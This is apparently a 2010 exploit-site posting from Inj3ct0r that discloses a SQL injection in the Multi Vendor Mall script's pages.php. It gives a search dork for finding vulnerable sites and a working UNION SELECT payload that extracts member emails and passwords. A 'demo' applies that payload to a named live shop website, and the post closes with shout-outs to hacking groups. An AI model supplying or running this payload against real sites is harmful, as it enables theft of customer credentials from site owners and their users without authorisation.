Multi Vendor Mall SQL Injection Vulnerability
Posted on 26 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Multi Vendor Mall SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= Multi Vendor Mall SQL Injection Vulnerability ============================================= ################################################################################################# [+] Multi Vendor Mall (pages.php) SQL Injection Vulnerability [+] By Newbie_Campuz [+] Published: 2010-05-24 Pukul 22.00 WIB [+] jatimcrew.org/ ################################################################################################## # Script Homepage: # http://www.multishopcms.com [+]Dork: pages.php?id= "Multi Vendor Mall" [+] SQL Injection http://[target]/[path]/pages.php?id=[SQL] http://[target]/[path]/pages.php?id=-9999+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl-- Demo : http://www.bestcraftsupplies.com/pages.php?id=7 http://www.bestcraftsupplies.com/pages.php?id=7+union+select+group_concat(EMAIL,0x3a3a,PASSWORD,0x3c62723e)+from+members_tbl-- ################################################################################################## Thanks to Allah SWT n Nabi Muhammad SAW Special Thanks to : My Parent, My Brother n My Sister Byz9991, Doraemon, Bang_Napi, Kenthot_cakep, Bom2, Shamus, Chapzha, Ficarciruas, pheonixhaxor, mywisdom, Pr3tty, newbie_043, KidDevilz, Android2009, XcyberX, flyff666, MISTERFRIBO, Osean, Vhacx,jamsh0ut, elfata cybermuttaqin,k3m4ngi, roentah,zhombhie, techno_x46 and YOU... !!! All admin, momod, spamguard, staff and member Jatim Crew.. All admin, momod, spamguard, staff and member Indonesianhacker All admin, momod, spamguard, staff and member xteamweb All admin, momod, spamguard, staff and member h2ozones All admin, momod, spamguard, staff and member master-forum ################################################################################################## # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-26]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
